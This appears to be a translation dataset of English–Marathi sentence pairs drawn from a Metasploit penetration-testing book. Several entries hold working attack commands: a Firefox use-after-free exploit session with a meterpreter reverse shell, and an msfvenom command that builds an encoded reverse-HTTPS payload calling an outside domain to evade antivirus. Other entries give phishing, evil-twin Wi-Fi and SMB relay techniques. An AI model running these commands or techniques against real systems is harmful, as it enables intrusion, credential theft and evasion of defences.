| {"en":"To help us with this task, we can use the HTTP Client Information Gather1. auxiliary module by specifying the IP address and port of the host to listen on and the URI to use, then use one of your favorite pretexts to make the victim open the link.","translation":"या कामात मदत करण्यासाठी, आम्ही HTTP क्लायंट माहिती गोळा करणारे 1. सहाय्यक मॉड्यूल वापरू शकतो, ऐकण्यासाठी होस्टचा IP पत्ता आणि पोर्ट निर्दिष्ट करून आणि वापरण्यासाठी URI, त्यानंतर पीडित व्यक्तीला लिंक उघडण्यासाठी तुमच्या आवडत्या कारणांपैकी एक वापरा.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"msf > use auxiliary/gather/browser_info msf auxiliary(gather/browser_info) > set SRVHOST 192.168.216.5 SRVHOST => 192.168.216.5 msf auxiliary(gather/browser_info) > set SRVPORT 80 SRVPORT => 80 msf auxiliary(gather/browser_info) > set URIPATH / URIPATH => / msf auxiliary(gather/browser_info) > run [*] Auxiliary module running as background job 1.","translation":"msf > use auxiliary/gather/browser_info msf auxiliary(gather/browser_info) > set SRVHOST 192.168.216.5 SRVHOST => 192.168.216.5 msf auxiliary(gather/browser_info) > set SRVPORT 80 SRVPORT => 80 msf auxiliary(gather/browser_info) > set URIPATH / URIPATH => / msf auxiliary(gather/browser_info) > run [*] सहाय्यक मॉड्यूल पार्श्वभूमीवर चालत आहे, काम 1.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"msf auxiliary(gather/browser_info) > [*] Using URL: http://192.168.216.5:80/ [*] Server started. [*] Gathering target information for 192.168.216.150 [*] Sending HTML response to 192.168.216.150 [+] 192.168.216.150 - We have found the following interesting information: [*] 192.168.216.150 - source = Browser allows JavaScript [*] 192.168.216.150 - ua_name = Firefox [*] 192.168.216.150 - ua_ver = 41.0 [*] 192.168.216.150 - arch = x86 Client-Side Exploitation and Antivirus BypassChapter 7 [ 263 ] [*] 192.168.216.150 - os_name = Windows [*] 192.168.216.150 - language = en-US,en;q=0.5","translation":"msf auxiliary(gather/browser_info) > [*] URL वापरत आहे: http://192.168.216.5:80/ [*] सर्व्हर सुरू झाला. [*] 192.168.216.150 साठी लक्ष्य माहिती गोळा करत आहे [*] 192.168.216.150 ला HTML प्रतिसाद पाठवत आहे [+] 192.168.216.150 - आम्हाला खालील मनोरंजक माहिती आढळली आहे: [*] 192.168.216.150 - source = ब्राउझर JavaScript ला परवानगी देतो [*] 192.168.216.150 - ua_name = Firefox [*] 192.168.216.150 - ua_ver = 41.0 [*] 192.168.216.150 - arch = x86 क्लायंट-साइड शोषण आणि अँटीव्हायरस बायपास, प्रकरण 7 [ 263 ] [*] 192.168.216.150 - os_name = Windows [*] 192.168.216.150 - language = en-US,en;q=0.5","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Looking at the output, we can see that the victim is running Firefox version 41.0.2.","translation":"आउटपुट पाहता, आपण पाहू शकतो की पीडित व्यक्ती फायरफॉक्स व्हर्जन 41.0.2 वापरत आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"With this information, we can see that there is an exploit we can use on Firefox nsSMILTimeContainer::NotifyTimeChange() with the RCE exploit module.","translation":"या माहितीसह, आम्ही पाहू शकतो की फायरफॉक्स nsSMILTimeContainer::NotifyTimeChange() वर RCE शोषण मॉड्यूल वापरू शकतो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"To exploit the target using this module, we first need to set the IP address and3. port of the host we will be serving the exploit on and the URI to use, then set the payload we want to execute on the target, and since we are using a reverse shell, we also need to specify the listening host IP address:","translation":"या मॉड्यूलचा वापर करून लक्ष्य साधण्यासाठी, प्रथम, ज्या होस्टवर आपण शोषण सर्व्ह करणार आहोत त्याचा IP पत्ता आणि पोर्ट सेट करणे आवश्यक आहे आणि वापरण्यासाठी URI, त्यानंतर लक्ष्यवर कार्यान्वित करू इच्छित असलेला पेलोड सेट करा, आणि आम्ही रिव्हर्स शेल वापरत असल्याने, आम्हाला ऐकणाऱ्या होस्टचा IP पत्ता देखील निर्दिष्ट करणे आवश्यक आहे:","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"msf auxiliary(gather/browser_info) > use exploit/windows/browser/firefox_smil_uaf msf exploit(windows/browser/firefox_smil_uaf) > set SRVHOST 192.168.216.5 SRVHOST => 192.168.216.5 msf exploit(windows/browser/firefox_smil_uaf) > set SRVPORT 80 SRVPORT => 80 msf exploit(windows/browser/firefox_smil_uaf) > set URIPATH / URIPATH => / msf exploit(windows/browser/firefox_smil_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(windows/browser/firefox_smil_uaf) > set LHOST 192.168.216.5 LHOST => 192.168.216.5 msf exploit(windows/browser/firefox_smil_uaf) > exploit [*] Exploit running as background job 0.","translation":"msf auxiliary(gather/browser_info) > use exploit/windows/browser/firefox_smil_uaf msf exploit(windows/browser/firefox_smil_uaf) > set SRVHOST 192.168.216.5 SRVHOST => 192.168.216.5 msf exploit(windows/browser/firefox_smil_uaf) > set SRVPORT 80 SRVPORT => 80 msf exploit(windows/browser/firefox_smil_uaf) > set URIPATH / URIPATH => / msf exploit(windows/browser/firefox_smil_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(windows/browser/firefox_smil_uaf) > set LHOST 192.168.216.5 LHOST => 192.168.216.5 msf exploit(windows/browser/firefox_smil_uaf) > exploit [*] शोषण पार्श्वभूमीवर चालत आहे, काम 0.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"[*] Started reverse TCP handler on 192.168.216.5:4444 msf exploit(windows/browser/firefox_smil_uaf) > [*] Using URL: http://192.168.216.5:80/ [*] Server started.","translation":"[*] 192.168.216.5:4444 वर रिव्हर्स TCP हँडलर सुरू झाला msf exploit(windows/browser/firefox_smil_uaf) > [*] URL वापरत आहे: http://192.168.216.5:80/ [*] सर्व्हर सुरू झाला.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Now that we have everything set up, we will need the victim to browse to our site—this can be achieved using several means, email, social media, and so on When the victim accesses the URL, we should successfully exploit the use-after-4. free vulnerability and get a new session running in the context of the user that accesses the URL.","translation":"आता सर्व काही सेट झाल्यावर, आम्हाला पीडित व्यक्तीला आमच्या साइटवर ब्राउझ करण्याची आवश्यकता असेल—हे अनेक मार्गांनी, ईमेल, सोशल मीडिया इत्यादींद्वारे करता येते. जेव्हा पीडित व्यक्ती URL ऍक्सेस करतो, तेव्हा आम्ही वापरानंतर-मुक्त असुरक्षिततेचा यशस्वीरित्या फायदा घेऊ आणि त्या वापरकर्त्याच्या संदर्भात एक नवीन सत्र सुरू करू जो URL ऍक्सेस करतो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Note that, to prevent us from losing the session if the user closes the browser, this module uses the post/windows/manage/priv_migrate post-exploitation module to migrate to the explorer.exe process.","translation":"लक्षात घ्या की, वापरकर्त्याने ब्राउझर बंद केल्यास, आम्हाला सत्र गमावण्यापासून रोखण्यासाठी, हे मॉड्यूल एक्सप्लोरर.exe प्रक्रियेवर स्थलांतरित होण्यासाठी पोस्ट/विंडोज/व्यवस्थापन/priv_migrate पोस्ट-शोषण मॉड्यूल वापरते.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Client-Side Exploitation and Antivirus BypassChapter 7 [ 264 ] Bypassing antivirus and IDS/IPS As time went by, and Metasploit became the tool to use for exploitation, security vendors started to detect and stop exploits from running.","translation":"क्लायंट-साइड शोषण आणि अँटीव्हायरस बायपास, प्रकरण 7 [ 264 ] अँटीव्हायरस आणि IDS/IPS बायपास करणे. जसजसा वेळ गेला, आणि शोषण करण्यासाठी Metasploit हे साधन बनले, तसतसे सुरक्षा विक्रेत्यांनी शोषणाचा शोध घेणे आणि ते चालणे थांबवणे सुरू केले.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"One approach to bypassing these solutions is to combine the use of custom encoders and trusted certificates.","translation":"या उपायांना बायपास करण्याचा एक दृष्टिकोन म्हणजे कस्टम एन्कोडर आणि विश्वसनीय प्रमाणपत्रांचा वापर करणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"In this recipe, we will combine several bypass techniques in order to successfully bypass antivirus and IDS/IPS solutions.","translation":"या रेसिपीमध्ये, आम्ही अँटीव्हायरस आणि IDS/IPS सोल्यूशन्सना यशस्वीरित्या बायपास करण्यासाठी अनेक बायपास तंत्रांचा वापर करू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"First, we will create the payload using the bf_xor custom encoder used in the1. previous chapter; this way we can ensure that the solution looking for the default encoders won't flag our payload as malware:","translation":"पहिले, आम्ही मागील प्रकरणातील bf_xor कस्टम एन्कोडर वापरून पेलोड तयार करू; अशा प्रकारे, आम्ही हे सुनिश्चित करू शकतो की डीफॉल्ट एन्कोडर शोधणारे समाधान आमच्या पेलोडला मालवेअर म्हणून ध्वजांकित (flag) करणार नाही:","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"root@Metasploit:~# msfvenom -p windows/meterpreter/reverse_winhttps LHOST=zinitiative.com LPORT=443 HandlerSSLCert=./unified.pem StagerVerifySSLCert=true -f exe -e x86/bf_xor -o bypass.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/bf_xor x86/bf_xor succeeded with size 1259 (iteration=0) x86/bf_xor chosen with final size 1259 Payload size: 1259 bytes Final size of exe file: 73802 bytes Saved as: bypass.exe","translation":"root@Metasploit:~# msfvenom -p windows/meterpreter/reverse_winhttps LHOST=zinitiative.com LPORT=443 HandlerSSLCert=./unified.pem StagerVerifySSLCert=true -f exe -e x86/bf_xor -o bypass.exe कोणतीही प्लॅटफॉर्म निवडली नाही, पेलोडमधून Msf::Module::Platform::Windows निवडत आहे कोणतीही आर्किटेक्चर निवडली नाही, पेलोडमधून Arch: x86 निवडत आहे 1 सुसंगत एन्कोडर आढळले x86/bf_xor च्या 1 पुनरावृत्तीसह पेलोड एन्कोड करण्याचा प्रयत्न करत आहे x86/bf_xor 1259 आकारात यशस्वी (पुनरावृत्ती=0) x86/bf_xor अंतिम आकार 1259 सह निवडले पेलोडचा आकार: 1259 bytes exe फाइलचा अंतिम आकार: 73802 bytes म्हणून जतन केले: bypass.exe","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"To send emails, you first need to configure the SMTP relay details in the Sending Profiles section.","translation":"ईमेल पाठवण्यासाठी, तुम्हाला प्रथम पाठवणारे प्रोफाइल विभागात SMTP रिले तपशील कॉन्फिगर करणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"One way to ensure your phishing emails will get to the intended recipients is to use hosted business email solutions such as Zoho Mail.","translation":"तुमचे फिशिंग ईमेल इच्छित प्राप्तकर्त्यांपर्यंत पोहोचतील हे सुनिश्चित करण्याचा एक मार्ग म्हणजे झोहो मेल सारखे होस्ट केलेले व्यवसाय ईमेल सोल्यूशन्स वापरणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Just go to https://www.zoho.com/mail/, create a free business email account, and you are good to go.","translation":"फक्त https://www.zoho.com/mail/ वर जा, एक विनामूल्य व्यवसाय ईमेल खाते तयार करा आणि तुम्ही तयार आहात.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"It even allows you to set up a custom domain, which you can use to reinforce your phishing campaign pretext.","translation":"हे तुम्हाला एक सानुकूल डोमेन सेट करण्यास देखील अनुमती देते, जे तुम्ही तुमच्या फिशिंग मोहिमेच्या कारणास बळ देण्यासाठी वापरू शकता.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"In this recipe, I will not cover how to set up and configure a phishing campaign with Gophish.","translation":"या कृतीमध्ये, मी गोफिशसह फिशिंग मोहिम कशी सेट आणि कॉन्फिगर करायची हे कव्हर करणार नाही.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"You can find the updated documentation at https://gophish.gitbooks.io/ user-guide/content/getting_started.html.","translation":"तुम्ही https://gophish.gitbooks.io/ user-guide/content/getting_started.html येथे अद्ययावत दस्तऐवजीकरण शोधू शकता.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The objective of this recipe is to show you that you can and should take advantage of cloud technologies to ease some of the tasks performed during a penetration test.","translation":"या कृतीचा उद्देश तुम्हाला हे दर्शवणे आहे की तुम्ही क्लाउड तंत्रज्ञानाचा फायदा घेऊ शकता आणि सुरक्षा परीक्षणादरम्यान (penetration test) काही कामे सुलभ करू शकता.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Now that you know how to set up and launch a phishing campaign, you can, for example, embed an HTML application link in the phishing email using the Metasploit HTA Web Server exploit module in order to compromise the target.","translation":"आता तुम्हाला फिशिंग मोहिम कशी सेट करायची आणि सुरू करायची हे माहित आहे, उदाहरणार्थ, लक्ष्य तडजोड करण्यासाठी मेटास्प्लाइट एचटीए वेब सर्व्हर एक्सप्लॉइट मॉड्यूल वापरून फिशिंग ईमेलमध्ये एचटीएमएल ॲप्लिकेशन लिंक एम्बेड करू शकता.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Then, when the target opens the email and runs the HTA, you will get a new session.","translation":"त्यानंतर, जेव्हा लक्ष्य ईमेल उघडेल आणि HTA चालवेल, तेव्हा तुम्हाला एक नवीन सत्र मिळेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Imagination and practice are your friends; you are not limited to HTA.","translation":"कल्पनाशक्ती आणि सराव हे तुमचे मित्र आहेत; तुम्ही HTA पुरते मर्यादित नाही.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Learn from the adversary; by reading the latest security reports, you can learn about new attack vectors used in the wild and mimic them using Metasploit.","translation":"शत्रूकडून शिका; नवीनतम सुरक्षा अहवाल वाचून, तुम्ही जंगलात वापरल्या जाणाऱ्या नवीन हल्ल्याच्या पद्धती (attack vectors) बद्दल शिकू शकता आणि मेटास्प्लाइट वापरून त्यांची नक्कल करू शकता.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Setting up a cloud penetration testing lab Testing new tools and techniques is an important part of a penetration tester's job.","translation":"क्लाउड पेनिट्रेशन टेस्टिंग लॅबची स्थापना करणे नवीन साधने आणि तंत्रज्ञानाची चाचणी करणे हे पेनिट्रेशन परीक्षकाचे (penetration tester) एक महत्त्वाचे काम आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Every day new tools are created and new techniques found, so keep up with the industry.","translation":"दररोज नवीन साधने तयार केली जातात आणि नवीन तंत्रे शोधली जातात, त्यामुळे उद्योगाशी जुळलेले राहा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"We have to invest a fair amount of our time practicing and mastering the tools of our trade.","translation":"आपल्या व्यवसायाची साधने वापरण्याचा सराव आणि त्यावर प्रभुत्व मिळवण्यासाठी आपल्याला पुरेसा वेळ गुंतवावा लागतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Having a data center where we can set up a lab environment and practice is not always possible and can be quite expensive.","translation":"डेटा सेंटर असणे जिथे आपण प्रयोगशाळेचे वातावरण तयार करू शकतो आणि सराव करू शकतो, हे नेहमी शक्य नसते आणि ते खूप खर्चिक असू शकते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"With cloud services getting cheaper, faster, and easier to use, we do not have an excuse not to have a penetration testing lab.","translation":"क्लाउड सेवा स्वस्त, जलद आणि वापरण्यास सुलभ होत असल्याने, आपल्याकडे पेनिट्रेशन टेस्टिंग लॅब (penetration testing lab) नसेल, असे कारण नाही.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Take for example Azure; create a free account, and you get $200 of credit to explore services for 30 days.","translation":"उदाहरणार्थ, Azure घ्या; एक विनामूल्य खाते तयार करा आणि तुम्हाला 30 दिवसांसाठी सेवा एक्सप्लोर करण्यासाठी $200 क्रेडिट मिळतात.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Take a look at the virtual machines available, and you will see that creating a lab domain like the one used in this book can be done with a couple of clicks.","translation":"उपलब्ध व्हर्च्युअल मशीनवर एक नजर टाका, आणि तुम्हाला दिसेल की या पुस्तकात वापरलेल्यासारखे लॅब डोमेन काही क्लिकमध्ये तयार केले जाऊ शकते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"One of the biggest concerns with deploying vulnerable machines is to keep them contained and not expose them to the internet.","translation":"vulnerable machines तैनात (deploy) करताना सर्वात मोठी चिंता म्हणजे त्यांना सुरक्षित ठेवणे आणि त्यांना इंटरनेटवर उघड न करणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"For this, we can create a virtual network, which will create a logically isolated section in Microsoft Azure with this networking service.","translation":"यासाठी, आम्ही एक व्हर्च्युअल नेटवर्क तयार करू शकतो, जे या नेटवर्किंग सेवेसह Microsoft Azure मध्ये तार्किकदृष्ट्या वेगळा विभाग तयार करेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Metasploit has an HTTP GET Request URI Fuzzer that we can use.","translation":"मेटॅस्प्लाइटमध्ये एक HTTP GET विनंती URI फझर आहे जे आपण वापरू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We can see the result: Exploring ExploitsChapter 10 [ 336 ]","translation":"आपण निकाल पाहू शकतो: एक्सप्लोरिंग एक्सप्लॉइट्स चॅप्टर 10 [ 336 ]","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Now, we will learn how it worked and build our own small HTTP fuzzer that can be used against Disk Sorter Enterprise.","translation":"आता, ते कसे कार्य करते हे शिकू आणि डिस्क सॉर्टर एंटरप्राइझच्या विरोधात वापरले जाऊ शकणारे आमचे स्वतःचे लहान HTTP फझर तयार करू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The basic template to build a fuzzer will be similar to the one we discussed for the development of an auxiliary module, which should look as follows:","translation":"फझर तयार करण्यासाठीचे मूलभूत टेम्पलेट हे आम्ही सहाय्यक मॉड्यूलच्या विकासासाठी चर्चा केलेल्यासारखेच असेल, जे खालीलप्रमाणे दिसेल:","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"The @connected instance variable is used to make the connected variable available to all methods within the class.","translation":"@connected उदाहरण व्हेरिएबलचा उपयोग क्लासमधील सर्व पद्धतींसाठी कनेक्ट केलेले व्हेरिएबल उपलब्ध करण्यासाठी केला जातो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"sock.put is used to send the request using the TCP mixin, and sock.get_once is used get the response from the service, which will time out after one second","translation":"sock.put चा उपयोग TCP मिक्सिन वापरून विनंती पाठवण्यासाठी केला जातो, आणि sock.get_once चा उपयोग सेवेकडून प्रतिसाद मिळवण्यासाठी केला जातो, ज्याची वेळ एका सेकंदानंतर संपेल.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"It begins by initializing the required variables, which hold the last request sent, the errors, and a counter for the number of iterations.","translation":"हे आवश्यक व्हेरिएबल्स सुरू करून सुरू होते, जे पाठवलेली शेवटची विनंती, त्रुटी आणि पुनरावृत्तींची संख्या मोजण्यासाठी काउंटर ठेवतात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"If the waiting period for the response times out, the service is considered to be down and the iteration number, the length of the URI, and the URI are printed to the screen.","translation":"जर प्रतिसादाची प्रतीक्षा कालावधी संपला, तर सेवा बंद आहे असे मानले जाते आणि पुनरावृत्ती क्रमांक, URI ची लांबी आणि URI स्क्रीनवर मुद्रित केले जातात.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Great, our fuzzing module works and it is able to crash the Disk Sorter Enterprise service.","translation":"उत्कृष्ट, आपले फझिंग मॉड्यूल कार्य करते आणि ते डिस्क सॉर्टर एंटरप्राइझ सेवेला क्रॅश करण्यास सक्षम आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Penetration testing of wireless networks can present an organization with the real risks of compromise inherent in their wireless infrastructure.","translation":"वायरलेस नेटवर्कची प्रवेश चाचणी संस्थेला त्यांच्या वायरलेस इन्फ्रास्ट्रक्चरमध्ये असलेल्या तडजोडीचे वास्तविक धोके दर्शवू शकते.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Metasploit and wireless Although it doesn't have modules that directly exploit wireless vulnerabilities, Metasploit is one of the best tools to use when performing wireless penetration testing.","translation":"मेटॅस्प्लाइट आणि वायरलेस जरी यात वायरलेस असुरक्षिततेचा थेट फायदा घेणारे मॉड्यूल नसले तरी, वायरलेस प्रवेश चाचणी करताना मेटॅस्प्लाइट हे वापरण्यासाठी सर्वोत्तम साधनांपैकी एक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We will start by using the Windows Gather Wireless Current Connection Info post-exploitation module to gather information about the current connection on each wireless LAN interface, on the target machine:","translation":"आम्ही लक्ष्यित मशीनवर, प्रत्येक वायरलेस लॅन इंटरफेसवरील वर्तमान कनेक्शनबद्दल माहिती गोळा करण्यासाठी विंडोज गॅदर वायरलेस करंट कनेक्शन इन्फो पोस्ट-एक्सप्लॉयटेशन मॉड्यूल वापरून सुरुवात करू:","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"The Windows Gather Wireless Profile module is probably one of the most useful post-exploitation modules for performing wireless penetration testing, because it allows us to extract saved Wireless LAN profiles and get the wireless passphrase:","translation":"विंडोज गॅदर वायरलेस प्रोफाइल मॉड्यूल वायरलेस प्रवेश चाचणीसाठी सर्वात उपयुक्त पोस्ट-एक्सप्लॉयटेशन मॉड्यूल्सपैकी एक आहे, कारण ते आम्हाला सेव्ह केलेले वायरलेस लॅन प्रोफाइल काढण्याची आणि वायरलेस पासफ्रेज मिळवण्याची परवानगी देते:","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"An evil twin attack is a type of Wi-Fi attack where a rogue Wi-Fi access point (AP) is used to mimic a legitimate access point provided by a business, such as a coffee shop that offers free Wi-Fi access to its customers.","translation":"एविल ट्विन अटॅक हा एक प्रकारचा वाय-फाय हल्ला आहे, जिथे एक दुर्भावनापूर्ण वाय-फाय ऍक्सेस पॉइंट (AP) वापरला जातो, जो व्यवसायाने दिलेला कायदेशीर ऍक्सेस पॉइंटची नक्कल करतो, जसे की एक कॉफी शॉप जे त्याच्या ग्राहकांना विनामूल्य वाय-फाय ऍक्सेस ऑफर करते.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"By imitating a legitimate access point, we can trick users into connecting to it, so we can steal credentials, redirect victims to malware sites, perform LLMNR, NBT-NS poisoning attacks, and so on.","translation":"कायदेशीर ऍक्सेस पॉइंटची नक्कल करून, आम्ही वापरकर्त्यांना त्यावर कनेक्ट होण्यासाठी फसवू शकतो, जेणेकरून आम्ही क्रेडेन्शियल्स चोरू शकतो, बळींना मालवेअर साइट्सवर पुनर्निर्देशित करू शकतो, LLMNR, NBT-NS विषबाधा हल्ले करू शकतो, इत्यादी.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"In the process of connecting to a wireless network, most of the operating systems often keep the previous network's connections with them as the preferred networks list and send continuous probes in search of these networks.","translation":"वायरलेस नेटवर्कशी कनेक्ट होण्याच्या प्रक्रियेत, बहुतेक ऑपरेटिंग सिस्टम्स अनेकदा मागील नेटवर्कचे कनेक्शन त्यांच्यासोबत प्राधान्यीकृत नेटवर्क सूची म्हणून ठेवतात आणि या नेटवर्कच्या शोधात सतत तपासणी पाठवतात.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Because of sending continuous probes, any adversary within this range can listen passively and see the networks the user is probing for.","translation":"सतत तपासणी पाठवल्यामुळे, या श्रेणीतील कोणताही शत्रू निष्क्रियपणे ऐकू शकतो आणि वापरकर्ता ज्या नेटवर्कसाठी तपासणी करत आहे ते पाहू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"When clients attach to the fake AP we run, they will be expecting to be allocated an IP address.","translation":"जेव्हा क्लायंट्स आम्ही चालवलेल्या बनावट एपीला जोडले जातात, तेव्हा ते आयपी पत्ता वाटप होण्याची अपेक्षा करतील.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"SMB relay attacks allow us to relay SMB authentication requests to another host, gaining access to an authenticated SMB session if the user has access and network logins are allowed on the target host.","translation":"एसएमबी रिले हल्ल्यांमुळे आम्हाला एसएमबी प्रमाणीकरण विनंत्या दुसर्या होस्टवर रिले करता येतात, जर वापरकर्त्यास प्रवेश असेल आणि लक्ष्यित होस्टवर नेटवर्क लॉगइनची परवानगी असेल तर प्रमाणित एसएमबी सत्रात प्रवेश मिळवता येतो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"With the growth of cloud computing, tests for cloud-based applications, services, and infrastructures are on the rise.","translation":"क्लाउड कंप्यूटिंगच्या वाढीमुळे, क्लाउड-आधारित अनुप्रयोग, सेवा आणि पायाभूत सुविधांसाठी चाचण्या वाढत आहेत.","target_lang":"mr","domain":"technical","complexity":"moderate"} |